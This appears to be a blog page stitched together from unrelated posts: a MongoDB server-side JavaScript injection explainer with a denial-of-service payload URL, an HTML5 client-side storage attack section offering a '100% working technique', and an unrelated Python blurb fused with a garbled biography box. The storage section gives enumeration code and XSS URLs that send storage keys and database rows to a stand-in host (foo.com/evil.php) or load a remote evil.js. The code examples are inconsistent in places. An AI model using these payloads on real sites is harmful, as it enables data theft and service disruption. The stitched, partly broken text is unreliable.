NoSql Injection

JavaScript (server-side) injection vulnerabilities are not limited. NoSQL database engines that process JavaScript containing user-specified parameters can also be vulnerable.  For example, MongoDB supports the use of JavaScript  functions for query specifications etc. Since MongoDB databases do not have strictly defined database schemas, using JavaScript for query syntax allows developers to write complex queries against disparate  document structures. For example,we have a MongoDB collection that contains some documents representing books, some documents representing movies, and some documents representing music albums.  This JavaScript query function  will select all the documents in the specified collection that were either written, filmed, or recorded in the specified time:

function()

{

var search_time = input_value;

return this.publishingTime == search_time ||

this.filmingTime == search_Time ||

this.recordingTime == search_Time;

}

If the application developer were building this application in PHP (for example), the source code might look like this:

$query = ‘function()

{

var search_time = ” .

$_GET[‘time’] . ”;’ .

‘return this.publishingTime == search_Time || ‘ .

this.filmingTime == search_Time || ‘ .

this.recordingTime == search_Time;}’;

$cursor = $collection->find(array(‘$where’ => $query));

This code uses the value of the request parameter “year” as the search
parameter. However, just as in a traditional SQL injection attack, since the query syntax is being constructed in an ad-hoc fashion  (i.e. query syntax concatenated along with user input), this code is vulnerable to a server-side JavaScript
injection attack. For example, this request would be an effective DoS attack against the system:
                  
                      http://server/app.php?year=1995′;while(1);var%20foo=’bar

credits : sql injection attacks and defence.

Client-side Storage using HTML5, really secure or just an abuse ?

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.

Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain )

Storage Object Enumeration

var ss = “”;
for(i in window.sessionStorage)
{
ss += i + ” “;
}
var ls = “”;
for(i = 0; i < localStorage.length; i++)
 {
ls += localStorage.key(i) + ” “;
 }

Database Object Enumeration

var db = “”;
for(i in window)
{
if(window[i] == “[object Database]”)
{
db += i + “ “;
}
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type=’table’
SELECT sql FROM sqlite_master WHERE name=’table_name’
SELECT sqlite_version()

One Shot Attack :

http://blah_blah.com/page.php?name=<script>document.write(‘<img
src=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js>
</script>


Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations: ( i know only for linux, not a windows user unfortunately :p )

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects

Python

Python is a programming language that lets you work more quickly and integrate your systems more effectively. You can learn to use Python and see almost immediate gains in productivity and lower maintenance costs ! “

Python runs on Windows, Linux/Unix, Mac OS X, and has been ported to the Java and .NET virtual machines.

Born
31 January 1956 (age 56)
Netherlands
Nationality
Dutch
Alma mater
University of Amsterdam
Occupation
Computer programmer, author
Employer
Google
Known for
Python programming language
Awards
Award for the Advancement of Free Software (2001)



Python is a remarkably powerful dynamic programming language that is used in a wide variety of application domains. Python is often compared to Tcl, Perl, Ruby, Scheme or Java. Some of its key distinguishing features include:
very clear, readable syntax
strong introspection capabilities
intuitive object orientation
natural expression of procedural code
full modularity, supporting hierarchical packages
exception-based error handling
very high level dynamic data types
extensive standard libraries and third party modules for virtually every task
extensions and modules easily written in C, C++ (or Java for Jython, or .NET languages for IronPython)
embeddable within applications as a scripting interface




Pin It on Pinterest